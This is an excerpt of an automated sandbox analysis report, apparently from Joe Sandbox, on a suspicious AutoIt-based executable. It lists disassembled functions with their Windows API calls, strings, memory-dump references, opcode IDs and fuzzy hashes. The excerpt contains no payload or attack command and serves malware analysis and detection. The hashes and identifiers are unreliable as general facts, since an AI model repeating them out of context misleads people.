                                    • Instruction Fuzzy Hash: BE112130640209ABDB20AF64CC4AFFEB324FF04760F108527F915972C1CA76A816EB92
                                    Function 00F592E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F07F41: _memmove.LIBCMT ref: 00F07F82
                                      • Part of subcall function 00F5B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00F5B0E7
                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00F59355
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ClassMessageNameSend_memmove
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 372448540-1403004172
                                    • Opcode ID: 9c30850ca1abe3bdbce910c3fbcccfb4b71585259ec364fe82adc49277dabed9
                                    • Instruction ID: d90d42dfc1671bd7a61c285a8b09424adee2beb4eb823698e25fca645a377e9c
                                    • Opcode Fuzzy Hash: 9c30850ca1abe3bdbce910c3fbcccfb4b71585259ec364fe82adc49277dabed9
                                    • Instruction Fuzzy Hash: 2501F571A49218EBCB08FB60CC918FE736DBF06321B140619FA32572D1DB79680CB650
                                    Function 00F591DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F07F41: _memmove.LIBCMT ref: 00F07F82
                                      • Part of subcall function 00F5B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00F5B0E7
                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 00F5924D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ClassMessageNameSend_memmove
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 372448540-1403004172
                                    • Opcode ID: 41c9808ebc4cbafc620221403aeda4027f13801b7ebd571a8351c3c75b0d4855
                                    • Instruction ID: 2a17b70bbe6aac80e048c9e374c31870c76e51e05f208c5a2c76b72d518e270a
                                    • Opcode Fuzzy Hash: 41c9808ebc4cbafc620221403aeda4027f13801b7ebd571a8351c3c75b0d4855
                                    • Instruction Fuzzy Hash: BD01D471E45208BBCB18EBA0CC92EFF73A89F05701F140019BA12672C1EA586E0CB6A1
                                    Function 00F59264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F07F41: _memmove.LIBCMT ref: 00F07F82
                                      • Part of subcall function 00F5B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00F5B0E7
                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 00F592D0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ClassMessageNameSend_memmove
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 372448540-1403004172
                                    • Opcode ID: 9288df109cda4a1b96414c30ce9d1b024e4089173f2c7159758da7d127508184
                                    • Instruction ID: f01b9164b4477171af2f70d273dcad56dce45e50214ba1e951195f40830e446d
                                    • Opcode Fuzzy Hash: 9288df109cda4a1b96414c30ce9d1b024e4089173f2c7159758da7d127508184
                                    • Instruction Fuzzy Hash: E7018471E45209B7CB14EAA0CD82AFF77A89F15711F2401157E12631C1DA595E0CB671
                                    Function 00F651CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ClassName_wcscmp
                                    • String ID: #32770
                                    • API String ID: 2292705959-463685578
                                    • Opcode ID: 52936109e66ea9bcfb9fa58f1db160898a53ae8549576accb877ce82202a2570
                                    • Instruction ID: e8c4d330b4dda867c1ce6a8f6050e3b130bff17121b38d373ff56d218b5c52ed
                                    • Opcode Fuzzy Hash: 52936109e66ea9bcfb9fa58f1db160898a53ae8549576accb877ce82202a2570
                                    • Instruction Fuzzy Hash: 1BE0617290432C1BE7109A95AC06FE7F7ACEB40731F000057FD10D3040D56099049BD1
                                    Function 00F581BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00F581CA
                                      • Part of subcall function 00F23598: _doexit.LIBCMT ref: 00F235A2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Message_doexit
                                    • String ID: AutoIt$Error allocating memory.
                                    • API String ID: 1993061046-4017498283
                                    • Opcode ID: c13817a8a5ae141c11f1ea624c23a879dd3d7ebacf8951fb1d19c49000406173
                                    • Instruction ID: 1124aa0e02aff6455d3def581a9853ec77b21822dd897cc4fe4890f8d4fae3ef
                                    • Opcode Fuzzy Hash: c13817a8a5ae141c11f1ea624c23a879dd3d7ebacf8951fb1d19c49000406173
                                    • Instruction Fuzzy Hash: C1D02B323C432C32D21032B43C07FC53A484B04B52F004025BB08650C38ED9948273ED
                                    Function 00F3B511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F3B564: _memset.LIBCMT ref: 00F3B571
                                      • Part of subcall function 00F20B84: InitializeCriticalSectionAndSpinCount.KERNEL32(00FC5158,00000000,00FC5144,00F3B540,?,?,?,00F0100A), ref: 00F20B89
                                    • IsDebuggerPresent.KERNEL32(?,?,?,00F0100A), ref: 00F3B544
                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00F0100A), ref: 00F3B553
                                    Strings
                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00F3B54E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                    • API String ID: 3158253471-631824599
                                    • Opcode ID: 867fe2f7b3aba7bb7f79412c76e61665c7847c81dd77c595dd8b34aca6479f82
                                    • Instruction ID: 44c612e6968aaf948b9c8751bb9afe07a876e3fad8746f443aa62390b165a505
                                    • Opcode Fuzzy Hash: 867fe2f7b3aba7bb7f79412c76e61665c7847c81dd77c595dd8b34aca6479f82
                                    • Instruction Fuzzy Hash: 65E0D8B06003148FD7B0DF28E9047827BE0AF00724F04892DE546C3351DBB8D448FB61
                                    Function 00F85BEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F85BF5
                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00F85C08
                                      • Part of subcall function 00F654E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F6555E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: FindMessagePostSleepWindow
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 529655941-2988720461
                                    • Opcode ID: 331aad1fc3c4f7f284ae58fbe5e2b5f54eb1819541b2028ac82a09f8396622b2
                                    • Instruction ID: 26d14f9f6fd4d14630e2871c674ebb43ef2ee3e6c84dda1b06e307bd091304be
                                    • Opcode Fuzzy Hash: 331aad1fc3c4f7f284ae58fbe5e2b5f54eb1819541b2028ac82a09f8396622b2
                                    • Instruction Fuzzy Hash: 42D0C931388315BAE764AB70AC1FFE77A14AB00B51F040825B746AA1D0D9E49805DB50